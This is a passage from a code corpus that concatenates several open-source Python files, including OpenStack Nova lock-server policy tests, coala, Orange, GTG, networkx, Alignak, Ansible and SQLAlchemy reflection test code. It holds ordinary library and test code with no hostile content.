self.legacy_admin_context, self.system_admin_context,
self.project_admin_context]
# Check that non-admin is not able to unlock the server
# which is locked by other
self.admin_unauthorized_contexts = [
self.system_member_context, self.system_reader_context,
self.system_foo_context, self.project_member_context,
self.project_reader_context, self.project_foo_context,
self.other_project_member_context,
self.other_project_reader_context,
]
@mock.patch('nova.compute.api.API.lock')
def test_lock_server_policy(self, mock_lock):
rule_name = ls_policies.POLICY_ROOT % 'lock'
self.common_policy_check(self.admin_or_owner_authorized_contexts,
self.admin_or_owner_unauthorized_contexts,
rule_name,
self.controller._lock,
self.req, self.instance.uuid,
body={'lock': {}})
@mock.patch('nova.compute.api.API.unlock')
def test_unlock_server_policy(self, mock_unlock):
rule_name = ls_policies.POLICY_ROOT % 'unlock'
self.common_policy_check(self.admin_or_owner_authorized_contexts,
self.admin_or_owner_unauthorized_contexts,
rule_name,
self.controller._unlock,
self.req, self.instance.uuid,
body={'unlock': {}})
@mock.patch('nova.compute.api.API.unlock')
@mock.patch('nova.compute.api.API.is_expected_locked_by')
def test_unlock_override_server_policy(self, mock_expected, mock_unlock):
mock_expected.return_value = False
rule = ls_policies.POLICY_ROOT % 'unlock'
self.policy.set_rules({rule: "@"}, overwrite=False)
rule_name = ls_policies.POLICY_ROOT % 'unlock:unlock_override'
self.common_policy_check(self.admin_authorized_contexts,
self.admin_unauthorized_contexts,
rule_name,
self.controller._unlock,
self.req, self.instance.uuid,
body={'unlock': {}})
def test_lock_server_policy_failed_with_other_user(self):
# Change the user_id in request context.
req = fakes.HTTPRequest.blank('')
req.environ['nova.context'].user_id = 'other-user'
rule_name = ls_policies.POLICY_ROOT % 'lock'
self.policy.set_rules({rule_name: "user_id:%(user_id)s"})
exc = self.assertRaises(
exception.PolicyNotAuthorized, self.controller._lock,
req, fakes.FAKE_UUID, body={'lock': {}})
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
@mock.patch('nova.compute.api.API.lock')
def test_lock_sevrer_overridden_policy_pass_with_same_user(
self, mock_lock):
rule_name = ls_policies.POLICY_ROOT % 'lock'
self.policy.set_rules({rule_name: "user_id:%(user_id)s"})
self.controller._lock(self.req,
fakes.FAKE_UUID,
body={'lock': {}})
class LockServerScopeTypePolicyTest(LockServerPolicyTest):
"""Test Lock Server APIs policies with system scope enabled.
This class set the nova.conf [oslo_policy] enforce_scope to True
so that we can switch on the scope checking on oslo policy side.
It defines the set of context with scoped token
which are allowed and not allowed to pass the policy checks.
With those set of context, it will run the API operation and
verify the expected behaviour.
"""
def setUp(self):
super(LockServerScopeTypePolicyTest, self).setUp()
self.flags(enforce_scope=True, group="oslo_policy")
class LockServerNoLegacyPolicyTest(LockServerScopeTypePolicyTest):
"""Test Lock Server APIs policies with system scope enabled,
and no more deprecated rules that allow the legacy admin API to
access system APIs.
"""
without_deprecated_rules = True
def setUp(self):
super(LockServerNoLegacyPolicyTest, self).setUp()
# Check that system admin or and server owner is able to lock/unlock
# the server
self.admin_or_owner_authorized_contexts = [
self.system_admin_context,
self.project_admin_context, self.project_member_context]
# Check that non-system/admin/owner is not able to lock/unlock
# the server
self.admin_or_owner_unauthorized_contexts = [
self.legacy_admin_context, self.system_member_context,
self.system_reader_context, self.system_foo_context,
self.other_project_member_context, self.project_reader_context,
self.project_foo_context,
self.other_project_reader_context,
]
# Check that system admin is able to unlock the server which is
# locked by other
self.admin_authorized_contexts = [
self.system_admin_context]
# Check that system non-admin is not able to unlock the server
# which is locked by other
self.admin_unauthorized_contexts = [
self.legacy_admin_context, self.system_member_context,
self.system_reader_context, self.system_foo_context,
self.project_admin_context, self.project_member_context,
self.other_project_member_context,
self.project_foo_context, self.project_reader_context,
self.other_project_reader_context,
]
class LockServerOverridePolicyTest(LockServerNoLegacyPolicyTest):
"""Test Lock Server APIs policies with system and project scoped
but default to system roles only are allowed for project roles
if override by operators. This test is with system scope enable
and no more deprecated rules.
"""
def setUp(self):
super(LockServerOverridePolicyTest, self).setUp()
# Check that system admin or project scoped role as override above
# is able to unlock the server which is locked by other
self.admin_authorized_contexts = [
self.system_admin_context,
self.project_admin_context, self.project_member_context]
# Check that non-system admin or project role is not able to
# unlock the server which is locked by other
self.admin_unauthorized_contexts = [
self.legacy_admin_context, self.system_member_context,
self.system_reader_context, self.system_foo_context,
self.other_project_member_context,
self.project_foo_context, self.project_reader_context,
self.other_project_reader_context,
]
def test_unlock_override_server_policy(self):
rule = ls_policies.POLICY_ROOT % 'unlock:unlock_override'
self.policy.set_rules({
# make unlock allowed for everyone so that we can check unlock
# override policy.
ls_policies.POLICY_ROOT % 'unlock': "@",
rule: base_policy.PROJECT_MEMBER_OR_SYSTEM_ADMIN}, overwrite=False)
super(LockServerOverridePolicyTest,
self).test_unlock_override_server_policy()
| apache-2.0 |
aptrishu/coala | coalib/results/result_actions/IgnoreResultAction.py | 6 | 4593 | from coalib.bearlib.languages import Language
from coalib.bearlib.languages.Language import UnknownLanguageError
from coalib.results.result_actions.ResultAction import ResultAction
from coalib.results.Result import Result
from coalib.results.Diff import Diff
from coala_utils.FileUtils import detect_encoding
from os.path import exists
from os.path import isfile
import shutil
import logging
from coala_utils.decorators import enforce_signature
class IgnoreResultAction(ResultAction):
SUCCESS_MESSAGE = 'An ignore comment was added to your source code.'
@staticmethod
@enforce_signature
def is_applicable(result: Result,
original_file_dict,
file_diff_dict,
applied_actions=()):
"""
For being applicable, the result has to point to a number of files
that have to exist i.e. have not been previously deleted.
Additionally, the action should not have been applied to the current
result before.
"""
if IgnoreResultAction.__name__ in applied_actions:
return 'An ignore comment was already added for this result.'
if len(result.affected_code) == 0:
return 'The result is not associated with any source code.'
filenames = set(src.renamed_file(file_diff_dict)
for src in result.affected_code)
if any(exists(filename) for filename in filenames):
return True
return ("The result is associated with source code that doesn't "
'seem to exist.')
def apply(self, result, original_file_dict, file_diff_dict, language: str,
no_orig: bool=False):
"""
Add (I)gnore comment
"""
ignore_comment = self.get_ignore_comment(result.origin, language)
if not ignore_comment:
return file_diff_dict
source_range = next(filter(lambda sr: exists(sr.file),
result.affected_code))
filename = source_range.file
ignore_diff = Diff(original_file_dict[filename])
ignore_diff.change_line(
source_range.start.line,
original_file_dict[filename][source_range.start.line-1],
original_file_dict[filename][source_range.start.line-1].rstrip() +
' ' + ignore_comment)
if filename in file_diff_dict:
ignore_diff = file_diff_dict[filename] + ignore_diff
else:
if not no_orig and isfile(filename):
shutil.copy2(filename, filename + '.orig')
file_diff_dict[filename] = ignore_diff
new_filename = ignore_diff.rename if ignore_diff.rename else filename
with open(new_filename, mode='w',
encoding=detect_encoding(new_filename)) as file:
file.writelines(ignore_diff.modified)
return file_diff_dict
def get_ignore_comment(self, origin, language):
r"""
Returns a string of Ignore Comment, depending on the language
Supports Single Line Comments
>>> IgnoreResultAction().get_ignore_comment("Bear", "css")
'/* Ignore Bear */\n'
And Multiline Comments
>>> IgnoreResultAction().get_ignore_comment("Bear", "c")
'// Ignore Bear\n'
"""
try:
comment_delimiter = Language[
language].get_default_version().comment_delimiter
ignore_comment = (str(comment_delimiter) + ' Ignore ' +
origin + '\n')
except AttributeError:
# singleline comments not supported by language
try:
multiline_comment_delimiter = Language[
language].get_default_version().multiline_comment_delimiters
start_comment, end_comment = next(iter(
multiline_comment_delimiter.items()))
ignore_comment = (str(start_comment) + ' Ignore ' +
origin + ' ' +
str(end_comment) + '\n')
except UnknownLanguageError:
# multiline comments also not supported by language
logging.warning(
'coala does not support Ignore in "{language}". Consider'
' opening an issue at https://github.com/coala/coala/issues'
' so we can add support for this language.'.format(
language=language))
ignore_comment = None
return ignore_comment
| agpl-3.0 |
jlegendary/orange | Orange/data/utils.py | 6 | 8732 | #from __future__ import absolute_import
from Orange.core import TransformValue, \
Ordinal2Continuous, \
Discrete2Continuous, \
NormalizeContinuous, \
MapIntValue
import random
import math
from operator import itemgetter
from collections import defaultdict
from Orange.data import Table, Domain, Instance
import Orange.feature as variable
def table_map(table, attrs, exclude_special=True):
mapping = defaultdict(list)
for i, ex in enumerate(table):
key = [ex[a] for a in attrs]
if exclude_special and any(k.isSpecial() for k in key):
continue
key = tuple([str(k) for k in key])
mapping[key].append(i)
return mapping
def left_join(table1, table2, on_attrs1, on_attrs2):
""" Left join table1 and table2 on attributes attr1 and attr2
"""
if not isinstance(on_attrs1, (list, tuple)):
on_attrs1 = [on_attrs1]
if not isinstance(on_attrs2, (list, tuple)):
on_attrs2 = [on_attrs2]
key_map1 = table_map(table1, on_attrs1)
key_map2 = table_map(table2, on_attrs2)
left_examples = []
right_examples = []
for ex in table1:
key = tuple([str(ex[a]) for a in on_attrs1])
if key in key_map1 and key in key_map2:
for ind in key_map2[key]:
ex2 = table2[ind]
left_examples.append(ex)
right_examples.append(ex2)
else:
left_examples.append(ex)
right_examples.append(Instance(table2.domain))
left_table = Table(left_examples)
right_table = Table(right_examples)
new_table = Table([left_table, right_table])
return new_table
def right_join(table1, table2, on_attrs1, on_attrs2):
""" Right join table1 and table2 on attributes attr1 and attr2
"""
if not isinstance(on_attrs1, (list, tuple)):
on_attrs1 = [on_attrs1]
if not isinstance(on_attrs2, (list, tuple)):
on_attrs2 = [on_attrs2]
key_map1 = table_map(table1, on_attrs1)
key_map2 = table_map(table2, on_attrs2)
left_examples = []
right_examples = []
for ex in table2:
key = tuple([str(ex[a]) for a in on_attrs2])
if key in key_map1 and key in key_map2:
for ind in key_map1[key]:
ex1 = table1[ind]
left_examples.append(ex1)
right_examples.append(ex)
else:
left_examples.append(Instance(table1.domain))
right_examples.append(ex)
left_table = Table(left_examples)
right_table = Table(right_examples)
new_table = Table([left_table, right_table])
return new_table
def hstack(table1, table2):
""" Horizontally stack ``table1`` and ``table2``
"""
return Table([table1, table2])
def vstack(table1, table2):
""" Stack ``table1`` and ``table2`` vertically.
"""
return Table(table1[:] + table2[:])
def take(table, indices, axis=0):
""" Take values form the ``table`` along the ``axis``.
"""
indices = mask_to_indices(indices, (len(table), len(table.domain)), axis)
if axis == 0:
# Take the rows (instances)
instances = [table[i] for i in indices]
table = Table(instances) if instances else Table(table.domain)
elif axis == 1:
# Take the columns (attributes)
variables = table.domain.variables
vars = [variables[i] for i in indices]
domain = Domain(vars, table.domain.class_var in vars)
domain.add_metas(table.domain.get_metas())
table = Table(domain, table)
return table
def mask_to_indices(mask, shape, axis=0):
""" Convert a mask into indices.
"""
import numpy
mask = numpy.asarray(mask)
dtype = mask.dtype
size = shape[axis]
if dtype.kind == "b":
if len(mask) != size:
raise ValueError("Mask size does not match the shape.")
indices = [i for i, m in zip(range(size), mask)]
elif dtype.kind == "i":
indices = mask
return indices
from threading import Lock as _Lock
_global_id = 0
_global_id_lock = _Lock()
def range_generator():
global _global_id
while True:
with _global_id_lock:
id = int(_global_id)
_global_id += 1
yield id
def uuid_generator():
import uuid
while True:
yield str(uuid.uuid4())
import Orange.feature
new_meta_id = Orange.feature.Descriptor.new_meta_id
_row_meta_id = new_meta_id()
_id_variable = variable.String("Row Id")
def add_row_id(table, start=0):
""" Add an Row Id meta variable to the table.
Parameters
==========
:param table: The ids will be added to this table.
:type table: Orange.data.Table
:param start: Start id for the ids. It can also be an iterator
yielding unique values.
:type start: int
"""
if _row_meta_id not in table.domain.get_metas():
table.domain.add_meta(_row_meta_id, _id_variable)
if isinstance(start, int):
ids = iter(range(start, start + len(table)))
else:
ids = start
for ex in table:
ex[_id_variable] = str(ids.next())
from Orange.statistics import distribution
def modus(values):
dist = distribution.Distribution(values[0].variable)
for v in values:
dist.add(v)
return dist.modus()
def mean(values):
dist = distribution.Distribution(values[0].variable)
for v in values:
dist.add(v)
return dist.average()
def geometric_mean(values):
values = [float(v) for v in values if not v.is_special()]
if values:
prod = reduce(float.__mul__, values, 1.0)
if prod >= 0:
return math.pow(prod, 1.0/len(values))
else:
return "?"
else:
return "?"
def harmonic_mean(values):
values = [float(v) for v in values if not v.is_special()]
if values:
hsum = sum(map(lambda v: 1.0 / (v or 1e-6), values))
return len(values) / (hsum or 1e-6)
else:
return "?"
_aggregate_mapping = {"random": random.choice,
"first": itemgetter(0),
"last": itemgetter(-1),
"modus": modus,
"mean": mean,
"geometric mean": geometric_mean,
"harmonic mean": harmonic_mean,
"min": lambda values : min( [(0,v) for v in values if not v.is_special()] + [(1,"?")] )[1],
"max": lambda values : max( [(1,v) for v in values if not v.is_special()] + [(0,"?")] )[1],
"sum": lambda values: sum([float(v) for v in values if not v.is_special()]),
"count": len,
"join": lambda values: ", ".join(map(str, values))
}
def _aggregate_func(func):
if isinstance(func, basestring):
if func in _aggregate_mapping:
return _aggregate_mapping[func]
else:
raise ValueError("Unknown aggregate function %r." % func)
return func
def group_by(table, group_attrs, aggregate_disc="first", aggregate_cont="mean",
aggregate_string="join", attr_aggregate=None):
if attr_aggregate is None:
attr_aggregate = {}
else:
attr_aggregate = dict(attr_aggregate) # It is modified later
all_vars = table.domain.variables + table.domain.getmetas().values()
aggregate_vars = []
for v in all_vars:
if v not in group_attrs:
if v in attr_aggregate:
pass
elif isinstance(v, variable.Continuous):
attr_aggregate[v] = aggregate_cont
elif isinstance(v, variable.Discrete):
attr_aggregate[v] = aggregate_disc
elif isinstance(v, variable.String):
attr_aggregate[v] = aggregate_string
else:
raise TypeError(v)
aggregate_vars.append(v)
attr_aggregate[v] = _aggregate_func(attr_aggregate[v])
indices_map = table_map(table, group_attrs, exclude_special=False)
new_instances = []
key_set = set()
for inst in table: # Iterate over the table instead of the inidces_map to preserve order
key = tuple([str(inst[v]) for v in group_attrs])
if key in key_set:
continue # Already seen this group
indices = indices_map[key]
new_instance = Instance(inst) # Copy
for v in aggregate_vars:
values = [table[i][v] for i in indices] # Values to aggregate
new_instance[v] = attr_aggregate[v](values)
new_instances.append(new_instance)
key_set.add(key)
return Table(new_instances)
| gpl-3.0 |
partp/gtg-services | tests/tools/test_dates.py | 2 | 5285 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Getting Things GNOME! - a personal organizer for the GNOME desktop
# Copyright (c) 2008-2014 - Lionel Dricot & Bertrand Rousseau
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/licenses/>.
# -----------------------------------------------------------------------------
from unittest import TestCase
from datetime import date, timedelta
from GTG import _
from GTG.tools.dates import Date
def next_month(aday, day=None):
""" Increase month, change 2012-02-13 into 2012-03-13.
If day is set, replace day in month as well
@returns: updated date """
if day is None:
day = aday.day
if aday.month == 12:
return aday.replace(day=day, month=1, year=aday.year + 1)
else:
return aday.replace(day=day, month=aday.month + 1)
class TestDates(TestCase):
def test_parses_common_formats(self):
self.assertEqual(str(Date.parse("1985-03-29")), "1985-03-29")
self.assertEqual(str(Date.parse("19850329")), "1985-03-29")
self.assertEqual(str(Date.parse("1985/03/29")), "1985-03-29")
def test_parses_todays_month_day_format(self):
today = date.today()
parse_string = "%02d%02d" % (today.month, today.day)
self.assertEqual(Date.parse(parse_string), today)
def test_parses_today_as_today(self):
today = date.today()
self.assertEqual(Date(today), today)
def test_parse_fuzzy_dates(self):
""" Parse fuzzy dates like now, soon, later, someday """
self.assertEqual(Date.parse("now"), Date.now())
self.assertEqual(Date.parse("soon"), Date.soon())
self.assertEqual(Date.parse("later"), Date.someday())
self.assertEqual(Date.parse("someday"), Date.someday())
self.assertEqual(Date.parse(""), Date.no_date())
def test_parse_local_fuzzy_dates(self):
""" Parse fuzzy dates in their localized version """
self.assertEqual(Date.parse(_("now")), Date.now())
self.assertEqual(Date.parse(_("soon")), Date.soon())
self.assertEqual(Date.parse(_("later")), Date.someday())
self.assertEqual(Date.parse(_("someday")), Date.someday())
self.assertEqual(Date.parse(""), Date.no_date())
def test_parse_fuzzy_dates_str(self):
""" Print fuzzy dates in localized version """
self.assertEqual(str(Date.parse("now")), _("now"))
self.assertEqual(str(Date.parse("soon")), _("soon"))
self.assertEqual(str(Date.parse("later")), _("someday"))
self.assertEqual(str(Date.parse("someday")), _("someday"))
self.assertEqual(str(Date.parse("")), "")
def test_parse_week_days(self):
""" Parse name of week days and don't care about case-sensitivity """
weekday = date.today().weekday()
for i, day in enumerate(['Monday', 'Tuesday', 'Wednesday',
'Thursday', 'Friday', 'Saturday', 'Sunday']):
if i <= weekday:
expected = date.today() + timedelta(7 + i - weekday)
else:
expected = date.today() + timedelta(i - weekday)
self.assertEqual(Date.parse(day), expected)
self.assertEqual(Date.parse(day.lower()), expected)
self.assertEqual(Date.parse(day.upper()), expected)
# Test localized version
day = _(day)
self.assertEqual(Date.parse(day), expected)
self.assertEqual(Date.parse(day.lower()), expected)
self.assertEqual(Date.parse(day.upper()), expected)
def test_missing_year_this_year(self):
""" Parsing %m%d have to find correct date:
we enter a day this year """
aday = next_month(date.today(), day=1)
parse_string = "%02d%02d" % (aday.month, aday.day)
self.assertEqual(Date.parse(parse_string), aday)
def test_missing_year_next_year(self):
""" Parsing %m%d have to find correct date:
we enter a day the next year """
aday = date.today()
if aday.day == 1 and aday.month == 1:
# not possible to add a day next year
return
aday = aday.replace(year=aday.year + 1, month=1, day=1)
self.assertEqual(Date.parse("0101"), aday)
def test_on_certain_day(self):
""" Parse due:3 as 3rd day this month or next month
if it is already more or already 3rd day """
for i in range(28):
i += 1
aday = date.today()
if i <= aday.day:
aday = next_month(aday, i)
else:
aday = aday.replace(day=i)
self.assertEqual(Date.parse(str(i)), aday)
| gpl-3.0 |
kernc/networkx | networkx/drawing/tests/test_layout.py | 43 | 1870 | """Unit tests for layout functions."""
import sys
from nose import SkipTest
from nose.tools import assert_equal
import networkx as nx
class TestLayout(object):
numpy=1 # nosetests attribute, use nosetests -a 'not numpy' to skip test
@classmethod
def setupClass(cls):
global numpy
try:
import numpy
except ImportError:
raise SkipTest('numpy not available.')
def setUp(self):
self.Gi=nx.grid_2d_graph(5,5)
self.Gs=nx.Graph()
self.Gs.add_path('abcdef')
self.bigG=nx.grid_2d_graph(25,25) #bigger than 500 nodes for sparse
def test_smoke_int(self):
G=self.Gi
vpos=nx.random_layout(G)
vpos=nx.circular_layout(G)
vpos=nx.spring_layout(G)
vpos=nx.fruchterman_reingold_layout(G)
vpos=nx.spectral_layout(G)
vpos=nx.spectral_layout(self.bigG)
vpos=nx.shell_layout(G)
def test_smoke_string(self):
G=self.Gs
vpos=nx.random_layout(G)
vpos=nx.circular_layout(G)
vpos=nx.spring_layout(G)
vpos=nx.fruchterman_reingold_layout(G)
vpos=nx.spectral_layout(G)
vpos=nx.shell_layout(G)
def test_adjacency_interface_numpy(self):
A=nx.to_numpy_matrix(self.Gs)
pos=nx.drawing.layout._fruchterman_reingold(A)
pos=nx.drawing.layout._fruchterman_reingold(A,dim=3)
assert_equal(pos.shape,(6,3))
def test_adjacency_interface_scipy(self):
try:
import scipy
except ImportError:
raise SkipTest('scipy not available.')
A=nx.to_scipy_sparse_matrix(self.Gs,dtype='d')
pos=nx.drawing.layout._sparse_fruchterman_reingold(A)
pos=nx.drawing.layout._sparse_spectral(A)
pos=nx.drawing.layout._sparse_fruchterman_reingold(A,dim=3)
assert_equal(pos.shape,(6,3))
| bsd-3-clause |
Alignak-monitoring-contrib/alignak-webui | alignak_webui/plugins/grafana/grafana.py | 1 | 1479 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2015-2018:
# Frederic Mohier, [email protected]
#
# This file is part of (WebUI).
#
# (WebUI) is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# (WebUI) is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with (WebUI). If not, see <http://www.gnu.org/licenses/>.
"""
Plugin Livestate
"""
from logging import getLogger
from alignak_webui.utils.plugin import Plugin
# pylint: disable=invalid-name
logger = getLogger(__name__)
class PluginGrafana(Plugin):
""" Grafana plugin """
def __init__(self, webui, plugin_dir, cfg_filenames=None):
"""Grafana plugin"""
self.name = 'Grafana'
self.backend_endpoint = None
self.pages = {
}
super(PluginGrafana, self).__init__(webui, plugin_dir, cfg_filenames)
def is_enabled(self):
"""Returns True if plugin is enabled"""
if self.enabled and self.app.config.get('grafana', ''):
return True
return False
| agpl-3.0 |
jhawkesworth/ansible-modules-core | windows/win_stat.py | 66 | 1711 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# this is a windows documentation stub, actual code lives in the .ps1
# file of the same name
DOCUMENTATION = '''
---
module: win_stat
version_added: "1.7"
short_description: returns information about a Windows file
description:
- Returns information about a Windows file
options:
path:
description:
- The full path of the file/object to get the facts of; both forward and
back slashes are accepted.
required: true
default: null
aliases: []
get_md5:
description:
- Whether to return the checksum sum of the file. As of Ansible 1.9 this
is no longer a MD5, but a SHA1 instead.
required: false
default: yes
aliases: []
get_checksum:
description:
- Whether to return a checksum of the file
(only sha1 currently supported)
required: false
default: yes
version_added: "2.1"
author: "Chris Church (@cchurch)"
'''
EXAMPLES = '''
# Obtain information about a file
- win_stat: path=C:\\foo.ini
register: file_info
- debug: var=file_info
'''
| gpl-3.0 |
cortedeltimo/SickRage | lib/sqlalchemy/testing/suite/test_reflection.py | 76 | 19615 |
import sqlalchemy as sa
from sqlalchemy import exc as sa_exc
from sqlalchemy import types as sql_types
from sqlalchemy import inspect
from sqlalchemy import MetaData, Integer, String
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.testing import engines, fixtures
from sqlalchemy.testing.schema import Table, Column
from sqlalchemy.testing import eq_, assert_raises_message
from sqlalchemy import testing
from .. import config
import operator
from sqlalchemy.schema import DDL, Index
from sqlalchemy import event
metadata, users = None, None
class HasTableTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table('test_table', metadata,
Column('id', Integer, primary_key=True),
Column('data', String(50))
)
def test_has_table(self):
with config.db.begin() as conn:
assert config.db.dialect.has_table(conn, "test_table")
assert not config.db.dialect.has_table(conn, "nonexistent_table")
class ComponentReflectionTest(fixtures.TablesTest):
run_inserts = run_deletes = None
__backend__ = True
@classmethod
def define_tables(cls, metadata):
cls.define_reflected_tables(metadata, None)
if testing.requires.schemas.enabled:
cls.define_reflected_tables(metadata, "test_schema")
@classmethod
def define_reflected_tables(cls, metadata, schema):
if schema:
schema_prefix = schema + "."
else:
schema_prefix = ""
if testing.requires.self_referential_foreign_keys.enabled:
users = Table('users', metadata,
Column('user_id', sa.INT, primary_key=True),
Column('test1', sa.CHAR(5), nullable=False),
Column('test2', sa.Float(5), nullable=False),
Column('parent_user_id', sa.Integer,
sa.ForeignKey('%susers.user_id' % schema_prefix)),
schema=schema,
test_needs_fk=True,
)
else:
users = Table('users', metadata,
Column('user_id', sa.INT, primary_key=True),
Column('test1', sa.CHAR(5), nullable=False),
Column('test2', sa.Float(5), nullable=False),
schema=schema,
test_needs_fk=True,
)
Table("dingalings", metadata,
Column('dingaling_id', sa.Integer, primary_key=True),
Column('address_id', sa.Integer,
sa.ForeignKey('%semail_addresses.address_id' %
schema_prefix)),
Column('data', sa.String(30)),
schema=schema,
test_needs_fk=True,
)
Table('email_addresses', metadata,
Column('address_id', sa.Integer),
Column('remote_user_id', sa.Integer,
sa.ForeignKey(users.c.user_id)),
Column('email_address', sa.String(20)),
sa.PrimaryKeyConstraint('address_id', name='email_ad_pk'),
schema=schema,
test_needs_fk=True,
)
if testing.requires.index_reflection.enabled:
cls.define_index(metadata, users)
if testing.requires.view_column_reflection.enabled:
cls.define_views(metadata, schema)
@classmethod
def define_index(cls, metadata, users):
Index("users_t_idx", users.c.test1, users.c.test2)
Index("users_all_idx", users.c.user_id, users.c.test2, users.c.test1)
@classmethod
def define_views(cls, metadata, schema):
for table_name in ('users', 'email_addresses'):
fullname = table_name
if schema:
fullname = "%s.%s" % (schema, table_name)
view_name = fullname + '_v'
query = "CREATE VIEW %s AS SELECT * FROM %s" % (
view_name, fullname)
event.listen(
metadata,
"after_create",
DDL(query)
)
event.listen(
metadata,
"before_drop",
DDL("DROP VIEW %s" % view_name)
)
@testing.requires.schema_reflection
def test_get_schema_names(self):
insp = inspect(testing.db)
self.assert_('test_schema' in insp.get_schema_names())
@testing.requires.schema_reflection
def test_dialect_initialize(self):
engine = engines.testing_engine()
assert not hasattr(engine.dialect, 'default_schema_name')
inspect(engine)
assert hasattr(engine.dialect, 'default_schema_name')
@testing.requires.schema_reflection
def test_get_default_schema_name(self):
insp = inspect(testing.db)
eq_(insp.default_schema_name, testing.db.dialect.default_schema_name)
@testing.provide_metadata
def _test_get_table_names(self, schema=None, table_type='table',
order_by=None):
meta = self.metadata
users, addresses, dingalings = self.tables.users, \
self.tables.email_addresses, self.tables.dingalings
insp = inspect(meta.bind)
if table_type == 'view':
table_names = insp.get_view_names(schema)
table_names.sort()
answer = ['email_addresses_v', 'users_v']
eq_(sorted(table_names), answer)
else:
table_names = insp.get_table_names(schema,
order_by=order_by)
if order_by == 'foreign_key':
answer = ['users', 'email_addresses', 'dingalings']
eq_(table_names, answer)
else:
answer = ['dingalings', 'email_addresses', 'users']
eq_(sorted(table_names), answer)
@testing.requires.table_reflection
def test_get_table_names(self):
self._test_get_table_names()
@testing.requires.table_reflection
@testing.requires.foreign_key_constraint_reflection
def test_get_table_names_fks(self):
self._test_get_table_names(order_by='foreign_key')
@testing.requires.table_reflection
@testing.requires.schemas
def test_get_table_names_with_schema(self):
self._test_get_table_names('test_schema')
@testing.requires.view_column_reflection
def test_get_view_names(self):
self._test_get_table_names(table_type='view')
@testing.requires.view_column_reflection
@testing.requires.schemas
def test_get_view_names_with_schema(self):
self._test_get_table_names('test_schema', table_type='view')
@testing.requires.table_reflection
@testing.requires.view_column_reflection
def test_get_tables_and_views(self):
self._test_get_table_names()
self._test_get_table_names(table_type='view')
def _test_get_columns(self, schema=None, table_type='table'):
meta = MetaData(testing.db)
users, addresses, dingalings = self.tables.users, \
self.tables.email_addresses, self.tables.dingalings
table_names = ['users', 'email_addresses']
if table_type == 'view':
table_names = ['users_v', 'email_addresses_v']
insp = inspect(meta.bind)
for table_name, table in zip(table_names, (users,
addresses)):
schema_name = schema
cols = insp.get_columns(table_name, schema=schema_name)
self.assert_(len(cols) > 0, len(cols))
# should be in order
for i, col in enumerate(table.columns):
eq_(col.name, cols[i]['name'])
ctype = cols[i]['type'].__class__
ctype_def = col.type
if isinstance(ctype_def, sa.types.TypeEngine):
ctype_def = ctype_def.__class__
# Oracle returns Date for DateTime.
if testing.against('oracle') and ctype_def \
in (sql_types.Date, sql_types.DateTime):
ctype_def = sql_types.Date
# assert that the desired type and return type share
# a base within one of the generic types.
self.assert_(len(set(ctype.__mro__).
intersection(ctype_def.__mro__).intersection([
sql_types.Integer,
sql_types.Numeric,
sql_types.DateTime,
sql_types.Date,
sql_types.Time,
sql_types.String,
sql_types._Binary,
])) > 0, '%s(%s), %s(%s)' % (col.name,
col.type, cols[i]['name'], ctype))
if not col.primary_key:
assert cols[i]['default'] is None
@testing.requires.table_reflection
def test_get_columns(self):
self._test_get_columns()
@testing.provide_metadata
def _type_round_trip(self, *types):
t = Table('t', self.metadata,
*[
Column('t%d' % i, type_)
for i, type_ in enumerate(types)
]
)
t.create()
return [
c['type'] for c in
inspect(self.metadata.bind).get_columns('t')
]
@testing.requires.table_reflection
def test_numeric_reflection(self):
for typ in self._type_round_trip(
sql_types.Numeric(18, 5),
):
assert isinstance(typ, sql_types.Numeric)
eq_(typ.precision, 18)
eq_(typ.scale, 5)
@testing.requires.table_reflection
def test_varchar_reflection(self):
typ = self._type_round_trip(sql_types.String(52))[0]
assert isinstance(typ, sql_types.String)
eq_(typ.length, 52)
@testing.requires.table_reflection
@testing.provide_metadata
def test_nullable_reflection(self):
t = Table('t', self.metadata,
Column('a', Integer, nullable=True),
Column('b', Integer, nullable=False))
t.create()
eq_(
dict(
(col['name'], col['nullable'])
for col in inspect(self.metadata.bind).get_columns('t')
),
{"a": True, "b": False}
)
@testing.requires.table_reflection
@testing.requires.schemas
def test_get_columns_with_schema(self):
self._test_get_columns(schema='test_schema')
@testing.requires.view_column_reflection
def test_get_view_columns(self):
self._test_get_columns(table_type='view')
@testing.requires.view_column_reflection
@testing.requires.schemas
def test_get_view_columns_with_schema(self):
self._test_get_columns(schema='test_schema', table_type='view')
@testing.provide_metadata
def _test_get_pk_constraint(self, schema=None):
meta = self.metadata
users, addresses = self.tables.users, self.tables.email_addresses
insp = inspect(meta.bind)
users_cons = insp.get_pk_constraint(users.name, schema=schema)
users_pkeys = users_cons['constrained_columns']
eq_(users_pkeys, ['user_id'])
addr_cons = insp.get_pk_constraint(addresses.name, schema=schema)
addr_pkeys = addr_cons['constrained_columns']
eq_(addr_pkeys, ['address_id'])
with testing.requires.reflects_pk_names.fail_if():
eq_(addr_cons['name'], 'email_ad_pk')
@testing.requires.primary_key_constraint_reflection
def test_get_pk_constraint(self):
self._test_get_pk_constraint()
